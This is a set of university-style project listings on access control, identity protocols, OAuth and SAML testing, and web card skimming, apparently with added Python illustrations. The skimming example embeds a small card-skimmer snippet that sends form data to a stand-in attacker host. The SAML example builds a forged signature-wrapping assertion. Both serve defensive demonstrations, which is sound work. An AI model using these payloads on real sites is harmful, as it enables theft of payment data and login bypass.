Projects

Policy Analysis and Translation

Introduction

The definition of access control policies is a critical step in securing IT resources and complying with legislation. Policy administrators need tools to analyze the policies they write and inherit - for instance, to ensure that the resulting set of policies is internally consistent (no request is both permitted and denied), compliant with legislation, and correctly translated into the implementation of their choice.

Objective

Develop a dockerized framework for ABAC policy analysis as a service.

Task list

  1. Create the Docker framework
    1. Dockerfile and installation of the required software from repositories
    2. service endpoints for policy analysis: input is a policy (say, as JSON) and the objective of the analysis; output is an analysis report
    3. UI for policy definition from a keyword database
  2. Policy analysis with pysmt
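As an added illustration of Task 2 (this is not the project's own code), the following Python script takes a policy as JSON and produces a consistency report: it enumerates every attribute assignment over the declared finite domains, reports each permit/deny rule pair that fires on the same request together with a witness assignment, and counts the requests that no rule covers. The policy format, the sample rules and the definition of "conflict" are assumptions; exhaustive enumeration stands in for the SMT encoding that pysmt would provide once domains become large or unbounded.

```python
"""Exhaustive consistency check for a small ABAC policy (added example).

The policy format, attribute domains and conflict definition are assumptions
made for this illustration. Because every attribute ranges over a finite set,
all assignments can be enumerated; an SMT solver (e.g. via pysmt) replaces the
enumeration when domains are large or symbolic.
"""
import itertools
import json

# Constructed sample policy: finite attribute domains plus permit/deny rules.
# A rule condition ("when") maps an attribute to the values it accepts.
SAMPLE_POLICY = json.dumps({
    "attributes": {
        "role": ["doctor", "nurse", "admin"],
        "department": ["cardiology", "oncology"],
        "resource": ["record", "schedule"],
    },
    "rules": [
        {"id": "R1", "effect": "permit",
         "when": {"role": ["doctor"], "resource": ["record"]}},
        {"id": "R2", "effect": "deny",
         "when": {"department": ["oncology"], "resource": ["record"]}},
        {"id": "R3", "effect": "permit",
         "when": {"role": ["admin"]}},
    ],
})


def rule_matches(rule, assignment):
    """A rule fires when every attribute it mentions has an accepted value."""
    return all(assignment[attr] in vals for attr, vals in rule["when"].items())


def analyze(policy_json):
    """Return a report with permit/deny conflicts and uncovered requests."""
    policy = json.loads(policy_json)
    names = sorted(policy["attributes"])
    domains = [policy["attributes"][n] for n in names]
    rules = policy["rules"]
    conflicts = {}   # (permit_id, deny_id) -> first witness assignment
    uncovered = 0
    total = 0
    for values in itertools.product(*domains):
        total += 1
        assignment = dict(zip(names, values))
        fired = [r for r in rules if rule_matches(r, assignment)]
        if not fired:
            uncovered += 1          # no rule applies: default decision needed
            continue
        for permit in fired:
            if permit["effect"] != "permit":
                continue
            for deny in fired:
                if deny["effect"] == "deny":
                    conflicts.setdefault((permit["id"], deny["id"]), assignment)
    return {
        "requests": total,
        "uncovered": uncovered,
        "conflicts": [
            {"permit": p, "deny": d, "witness": w}
            for (p, d), w in sorted(conflicts.items(), key=lambda kv: kv[0])
        ],
    }


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_POLICY), indent=2))
```

The report is what the analysis endpoint of Task 1.2 would return; a combining algorithm (deny-overrides, permit-overrides) resolves the reported conflicts only at evaluation time, so the administrator still needs the witness to decide whether the overlap was intended.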

Prerequisites

Knowledge of Docker would be advantageous for Task 1. Knowledge of SMT would be advantageous for Task 2.

Supervisor

Alessandro Tomasi - altomasi [at] fbk [dot] eu

Decentralized identity and authentication

Introduction

Decentralized identity, built on decentralized identifiers (DIDs), is an emerging proposal to offer identity subjects greater control and flexibility in the management of their digital identities. We are interested in exploring the state of currently available DID-enabling software, particularly with regard to the authentication protocols.

Objective

Develop a proof-of-concept integration of DID with legacy authentication.

Topics

  1. Analysis of Hyperledger Indy as a decentralized identity provider
  2. Security analysis of the SDK
  3. Development of a client - most likely Node.js or Android - to integrate DID in a use case
  4. Comparison of DID with eIDAS and OIDC, especially for authentication and data exchange
  5. Investigation of compliance with GDPR, KYC, and AML requirements

Prerequisites

Experience of Android development would be advantageous for topic 3.

Supervisor

Alessandro Tomasi - altomasi [at] fbk [dot] eu

Define attack patterns for OAuth protocol

Description

OAuth is an open standard for delegated authorization, widely used in corporations for exchanging authorization data (and, through profiles layered on top of it such as OpenID Connect, authentication data) between parties, in particular between an Authorization Server and a Client. Many services offered by corporations such as Google and Facebook are based on OAuth. We propose to define attack patterns for assessing the security of OAuth implementations. This activity can include the implementation of new plugins for an available tool for testing OAuth solutions.
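As an added illustration of what an attack pattern looks like when encoded as a test (this is not the unit's tool or one of its plugins), the following Python functions check a captured OAuth 2.0 authorization request, and the authorization response that answers it, against a few well-known weakness classes: a missing state parameter (CSRF on the redirect endpoint), the implicit grant (access token exposed in the URL fragment), an authorization code flow without PKCE or with the plain method (code interception), and a redirect_uri that is not HTTPS or contains a wildcard. The pattern identifiers, endpoints and parameter values are constructed for the example.

```python
"""Attack-pattern checks over captured OAuth 2.0 messages (added example).

Pattern names, URLs and parameter values are constructed for this
illustration; each check maps to a weakness class described in the OAuth 2.0
threat model and security best current practice documents.
"""
from urllib.parse import parse_qs, urlparse


def _params(query):
    """Flatten a query string into a dict (first value per key)."""
    return {k: v[0] for k, v in parse_qs(query).items()}


def check_authorization_request(url):
    """Return the pattern identifiers an authorization request is exposed to."""
    parsed = urlparse(url)
    q = _params(parsed.query)
    findings = []
    if parsed.scheme != "https":
        findings.append("AS_ENDPOINT_NOT_HTTPS")
    if "state" not in q:
        findings.append("MISSING_STATE")          # CSRF / code injection
    if q.get("response_type") == "token":
        findings.append("IMPLICIT_GRANT")         # token leaks via fragment
    if q.get("response_type") == "code" and "code_challenge" not in q:
        findings.append("MISSING_PKCE")           # authorization code interception
    # RFC 7636: code_challenge_method defaults to "plain" when absent
    if "code_challenge" in q and q.get("code_challenge_method", "plain") == "plain":
        findings.append("PKCE_PLAIN")
    redirect = q.get("redirect_uri")
    if redirect is None:
        findings.append("MISSING_REDIRECT_URI")   # relies on the AS default
    else:
        r = urlparse(redirect)
        if r.scheme != "https" and r.hostname not in ("localhost", "127.0.0.1"):
            findings.append("REDIRECT_URI_NOT_HTTPS")
        if "*" in redirect:
            findings.append("REDIRECT_URI_WILDCARD")
    return findings


def check_authorization_response(request_url, response_url):
    """Check the redirect back to the client against the request it answers."""
    req = _params(urlparse(request_url).query)
    parsed = urlparse(response_url)
    resp = _params(parsed.query)
    findings = []
    if "state" in req and resp.get("state") != req["state"]:
        findings.append("STATE_MISMATCH")         # response not bound to request
    if "access_token" in parse_qs(parsed.fragment):
        findings.append("TOKEN_IN_FRAGMENT")      # visible to scripts / referrers
    return findings


# Constructed sample requests: a weak one and a hardened one.
WEAK_REQUEST = ("https://as.example/authorize?response_type=token&client_id=app"
                "&redirect_uri=http%3A%2F%2Fapp.example%2Fcb")
HARDENED_REQUEST = ("https://as.example/authorize?response_type=code&client_id=app"
                    "&redirect_uri=https%3A%2F%2Fapp.example%2Fcb&state=x7f3"
                    "&code_challenge=dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk"
                    "&code_challenge_method=S256")

if __name__ == "__main__":
    print("weak:", check_authorization_request(WEAK_REQUEST))
    print("hardened:", check_authorization_request(HARDENED_REQUEST))
```

A plugin built on these checks would replay the captured request with one parameter removed or altered at a time (drop state, downgrade S256 to plain, point redirect_uri at an attacker host) and record whether the Authorization Server still issues a code or token; the static checks above only tell the tester which mutations are worth trying.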

Time frame

Anytime

Supervisor

Andrea Bisegna - a.bisegna [at] fbk [dot] eu

Roberto Carbone - carbone [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Preferably basic knowledge of Java.

Penetration Testing of a SAML SSO Implementation

Description

SAML SSO is an open standard broadly used in corporations for exchanging authentication and authorization data between parties, in particular between an identity provider and a service provider. Several corporate solutions (for instance Google's), together with infrastructures for digital identities such as eIDAS (electronic IDentification, Authentication and trust Services) and SPID (Sistema Pubblico di Identità Digitale), are based on the SAML Web Browser SSO profile.

In the context of a joint lab between the Security & Trust Unit (FBK) and the Istituto Poligrafico e Zecca dello Stato, we propose to perform penetration testing to assess the security of SAML SSO implementations. This activity can include the implementation of new plugins for an available tool for testing SSO solutions.
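As an added illustration of the kind of check a tester runs on a captured SAML Response (this is not the joint lab's tool or a plugin of it), the following Python code parses a constructed Response and flags the validation steps a service provider must perform and an attacker probes by violating: the InResponseTo binding to the original request, the number of Assertion elements found anywhere in the document (a second assertion is the typical shape of an XML Signature Wrapping attempt), the presence of a Signature on each assertion, the Conditions validity window, and the Audience restriction. The XML, identifiers and timestamps are constructed. One caveat is built into the example: it only checks that a Signature element is present, which is not signature verification; a real harness must verify the signature with the IdP key and confirm that the signed reference covers the assertion actually consumed.

```python
"""Structural checks on a SAML 2.0 Response (added example).

Sample XML, request IDs, entity IDs and timestamps are constructed for this
illustration. Signature presence is checked, signature validity is not.
"""
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}
ASSERTION_TAG = "{%s}Assertion" % NS["saml"]


def parse_saml_time(value):
    """SAML timestamps are UTC in xsd:dateTime form, e.g. 2020-01-01T10:00:00Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def check_saml_response(xml_text, expected_request_id, sp_entity_id, now_iso):
    """Return the findings a service provider should reject the response for."""
    now = parse_saml_time(now_iso)
    findings = []
    root = ET.fromstring(xml_text)
    if root.get("InResponseTo") != expected_request_id:
        findings.append("INRESPONSETO_MISMATCH")       # unsolicited or replayed
    assertions = list(root.iter(ASSERTION_TAG))        # any depth, not only children
    if len(assertions) != 1:
        findings.append("ASSERTION_COUNT_%d" % len(assertions))   # XSW suspicion
    for assertion in assertions:
        if assertion.find("ds:Signature", NS) is None:
            findings.append("ASSERTION_UNSIGNED")
        cond = assertion.find("saml:Conditions", NS)
        if cond is None:
            findings.append("NO_CONDITIONS")
            continue
        not_before = cond.get("NotBefore")
        not_on_or_after = cond.get("NotOnOrAfter")
        if not_before and now < parse_saml_time(not_before):
            findings.append("NOT_YET_VALID")
        if not_on_or_after is None or now >= parse_saml_time(not_on_or_after):
            findings.append("EXPIRED_OR_UNBOUNDED")
        audiences = [a.text for a in
                     cond.findall("saml:AudienceRestriction/saml:Audience", NS)]
        if sp_entity_id not in audiences:
            findings.append("AUDIENCE_MISMATCH")       # token meant for another SP
    return findings


# Constructed sample: a well-formed response with one signed assertion.
VALID_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
    ID="_r1" InResponseTo="_req42" Version="2.0">
  <saml:Assertion ID="_a1">
    <saml:Issuer>https://idp.example</saml:Issuer>
    <ds:Signature><ds:SignedInfo/></ds:Signature>
    <saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>
    <saml:Conditions NotBefore="2020-01-01T10:00:00Z" NotOnOrAfter="2020-01-01T10:05:00Z">
      <saml:AudienceRestriction><saml:Audience>https://sp.example</saml:Audience></saml:AudienceRestriction>
    </saml:Conditions>
  </saml:Assertion>
</samlp:Response>"""

# Constructed wrapping attempt: an unsigned assertion for "admin" placed before the
# signed one, hoping the SP verifies one assertion and consumes the other.
FORGED_ASSERTION = ('<saml:Assertion ID="_evil"><saml:Subject>'
                    '<saml:NameID>admin</saml:NameID></saml:Subject></saml:Assertion>')
WRAPPED_RESPONSE = VALID_RESPONSE.replace('<saml:Assertion ID="_a1">',
                                          FORGED_ASSERTION + '<saml:Assertion ID="_a1">')

if __name__ == "__main__":
    print(check_saml_response(VALID_RESPONSE, "_req42", "https://sp.example", "2020-01-01T10:02:00Z"))
    print(check_saml_response(WRAPPED_RESPONSE, "_req42", "https://sp.example", "2020-01-01T10:02:00Z"))
```

When used against a real service provider, each finding becomes a test case: send the response with that property violated and observe whether the SP still creates a session.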

Time frame

Anytime

Supervisor

Andrea Bisegna - a.bisegna [at] fbk [dot] eu

Roberto Carbone - carbone [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Preferably basic knowledge of Java and XML.

Identity Management Protocols

Description

We use our digital identities every day, from accessing our email account to online shopping. Underlying these transactions there are Identity Management protocols that exchange users' attributes among the different entities involved in the communication. During this internship we will agree on and explore one of the current open challenges in this context (e.g., study of some OAuth 2.0 extensions, analysis of SPID for native apps, analysis of Strong Customer Authentication (SCA) for PSD2, and so on).

Time frame

April

Supervisor

Giada Sciarretta - giada.sciarretta [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Notions of web and mobile security (e.g., authentication, authorization, digital certificates,...).

Analysis of web skimming vulnerabilities and attacks

Description

Web card skimming is a form of online carding fraud in which a checkout or payment page is compromised by injecting malicious code into it, typically by compromising a third-party script the page loads (for example an analytics service), in order to steal customer payment information as it is entered. In recent months the number of e-commerce websites affected by this kind of attack has increased dramatically, hitting not only small stores but also large websites. During this internship we will investigate how this attack works and elaborate a mitigation strategy.
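As an added illustration of one candidate mitigation for the third-party-script vector described above (Subresource Integrity, which the page itself does not name; this is not the internship's own result), the following Python code computes the integrity value the checkout page would pin for a vendor script, renders the corresponding script tag, and shows that a copy of the script with a skimmer appended no longer verifies, so a browser enforcing the attribute refuses to execute it. The script bodies, the CDN URL and the exfiltration endpoint in the constructed skimmer are made up for the example.

```python
"""Subresource Integrity (SRI) as a web-skimming mitigation (added example).

The trusted script, the tampered copy and the CDN URL are constructed. The
digest format follows the SRI specification: "<algo>-<base64 digest>".
"""
import base64
import hashlib
import hmac

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_integrity(script_bytes, algo="sha384"):
    """Compute the value the checkout page pins in the integrity attribute."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI only defines sha256, sha384 and sha512")
    digest = hashlib.new(algo, script_bytes).digest()
    return "%s-%s" % (algo, base64.b64encode(digest).decode("ascii"))


def verify_sri(script_bytes, integrity):
    """What the browser does before executing a fetched script."""
    algo, sep, _ = integrity.partition("-")
    if not sep or algo not in SRI_ALGORITHMS:
        return False
    return hmac.compare_digest(sri_integrity(script_bytes, algo), integrity)


def script_tag(src, integrity):
    """Render the pinned tag; crossorigin is required for cross-origin SRI checks."""
    return '<script src="%s" integrity="%s" crossorigin="anonymous"></script>' % (
        src, integrity)


# Constructed vendor script as reviewed and deployed by the shop.
TRUSTED_SCRIPT = b"window.analytics = { track: function (e) { console.log(e); } };\n"

# Constructed skimmer appended on the compromised CDN: reads card fields on
# submit and ships them to a host the attacker controls.
SKIMMED_SCRIPT = TRUSTED_SCRIPT + (
    b"document.addEventListener('submit', function () {\n"
    b"  var f = new FormData(document.querySelector('form'));\n"
    b"  navigator.sendBeacon('https://collect.attacker.example/s', f);\n"
    b"});\n")

if __name__ == "__main__":
    pin = sri_integrity(TRUSTED_SCRIPT)
    print(script_tag("https://cdn.example/analytics.js", pin))
    print("trusted verifies:", verify_sri(TRUSTED_SCRIPT, pin))
    print("skimmed verifies:", verify_sri(SKIMMED_SCRIPT, pin))
```

Two limits matter in practice: the pin has to be refreshed whenever the vendor legitimately releases a new version (otherwise the page breaks, which is why teams are tempted to drop the attribute), and SRI covers only the fetched file, not further scripts that file loads at runtime, which a Content Security Policy restricting script sources has to handle.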

Time frame

Anytime in 2020

Supervisor

Biniam Fisseha Demissie - demissie [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Knowledge of web-oriented programming languages, including JavaScript and HTML